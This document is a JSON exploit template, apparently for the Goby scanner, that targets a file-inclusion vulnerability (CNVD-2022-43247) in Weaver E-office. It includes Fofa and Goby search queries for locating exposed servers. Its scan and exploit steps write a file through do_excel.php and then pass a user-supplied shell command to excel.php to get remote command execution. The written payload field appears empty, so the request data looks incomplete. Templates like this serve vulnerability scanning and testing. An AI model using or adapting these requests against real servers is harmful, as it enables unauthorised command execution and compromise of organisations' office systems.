{ "Name": "Weaver E-office do_excel.php file inclusion vulnerability", "Description": "

e-office is a standard collaborative mobile office platform.

There is a file inclusion vulnerability in e-office, through which an attacker can write malicious files.

", "Product": "Weaver E-office", "Homepage": "www.weaver.com.cn", "DisclosureDate": "2022-03-23", "Author": "1243099890@qq.com", "FofaQuery": "((header=\"general/login/index.php\" || body=\"/general/login/view//images/updateLoad.gif\" || (body=\"szFeatures\" && body=\"eoffice\") || header=\"Server: eOffice\") && body!=\"Server: couchdb\") || banner=\"general/login/index.php\"", "GobyQuery": "((header=\"general/login/index.php\" || body=\"/general/login/view//images/updateLoad.gif\" || (body=\"szFeatures\" && body=\"eoffice\") || header=\"Server: eOffice\") && body!=\"Server: couchdb\") || banner=\"general/login/index.php\"", "Level": "3", "Impact": "

There is a file inclusion vulnerability in e-office, through which an attacker can write malicious files.

", "References": [], "Is0day": false, "HasExp": true, "ExpParams": [ { "name": "cmd", "type": "input", "value": "whoami", "show": "" } ], "ExpTips": { "Type": "", "Content": "" }, "ScanSteps": [ "AND", { "Request": { "method": "POST", "uri": "/general/charge/charge_list/do_excel.php", "follow_redirect": true, "header": { "Content-Length": "52", "Cache-Control": "max-age=0", "Upgrade-Insecure-Requests": "1", "Content-Type": "application/x-www-form-urlencoded", "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "Accept-Encoding": "gzip, deflate", "Accept-Language": "zh-CN,zh;q=0.9", "Connection": "close" }, "data_type": "text", "data": "html=" }, "ResponseTest": { "type": "group", "operation": "AND", "checks": [ { "type": "item", "variable": "$code", "operation": "==", "value": "200", "bz": "" } ] }, "SetVariable": [ "output|lastbody|regex|" ] }, { "Request": { "method": "GET", "uri": "/general/charge/charge_list/excel.php", "follow_redirect": true, "header": { "Content-Length": "52", "Cache-Control": "max-age=0", "Upgrade-Insecure-Requests": "1", "Content-Type": "application/x-www-form-urlencoded", "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "Accept-Encoding": "gzip, deflate", "Accept-Language": "zh-CN,zh;q=0.9", "Connection": "close" }, "data_type": "text", "data": "" }, "ResponseTest": { "type": "group", "operation": "AND", "checks": [ { "type": "item", "variable": "$code", "operation": "==", "value": "200", "bz": "" }, { "type": "item", "variable": "$body", "operation": "contains", "value": 
"e165421110ba03099a1c0393373c5b43", "bz": "" } ] }, "SetVariable": [] } ], "ExploitSteps": [ "AND", { "Request": { "method": "POST", "uri": "/general/charge/charge_list/do_excel.php", "follow_redirect": true, "header": { "Content-Length": "52", "Cache-Control": "max-age=0", "Upgrade-Insecure-Requests": "1", "Content-Type": "application/x-www-form-urlencoded", "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "Accept-Encoding": "gzip, deflate", "Accept-Language": "zh-CN,zh;q=0.9", "Connection": "close" }, "data_type": "text", "data": "html=" }, "ResponseTest": { "type": "group", "operation": "AND", "checks": [ { "type": "item", "variable": "$code", "operation": "==", "value": "200", "bz": "" } ] }, "SetVariable": [] }, { "Request": { "method": "POST", "uri": "/general/charge/charge_list/excel.php", "follow_redirect": true, "header": { "Content-Length": "52", "Cache-Control": "max-age=0", "Upgrade-Insecure-Requests": "1", "Content-Type": "application/x-www-form-urlencoded", "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "Accept-Encoding": "gzip, deflate", "Accept-Language": "zh-CN,zh;q=0.9", "Connection": "close" }, "data_type": "text", "data": "pass={{{cmd}}}" }, "ResponseTest": { "type": "group", "operation": "AND", "checks": [ { "type": "item", "variable": "$code", "operation": "==", "value": "200", "bz": "" } ] }, "SetVariable": [ "output|lastbody|regex|
(?s)(.*)
" ] } ], "Tags": [ "Remote File Inclusion" ], "VulType": [ "Remote File Inclusion" ], "CVEIDs": [ "" ], "CNNVD": [ "" ], "CNVD": [ "CNVD-2022-43247" ], "CVSSScore": "10.0", "Translation": { "CN": { "Name": "泛微 E-Office 文件包含漏洞(CNVD-2022-43247)", "Product": "泛微 E-office", "Description": "

e-office is a standard collaborative mobile office platform from Shanghai Weaver Network Technology Co., Ltd.

There is a file inclusion vulnerability in e-office, through which an attacker can write malicious files.

", "Recommendation": "

The vendor has released a patch to fix the vulnerability; please update promptly: https://www.weaver.com.cn/

", "Impact": "

There is a file inclusion vulnerability in e-office, through which an attacker can write malicious files.

", "VulType": [ "远程⽂件包含" ], "Tags": [ "远程⽂件包含" ] }, "EN": { "Name": "Weaver E-office do_excel.php file inclusion vulnerability", "Product": "Weaver E-office", "Description": "

e-office is a standard collaborative mobile office platform.

There is a file inclusion vulnerability in e-office, through which an attacker can write malicious files.

", "Recommendation": "

The manufacturer has released a patch to fix the vulnerability; please update promptly: https://www.weaver.com.cn/

", "Impact": "

There is a file inclusion vulnerability in e-office, through which an attacker can write malicious files.

", "VulType": [ "Remote File Inclusion" ], "Tags": [ "Remote File Inclusion" ] } }, "AttackSurfaces": { "Application": null, "Support": null, "Service": null, "System": null, "Hardware": null } }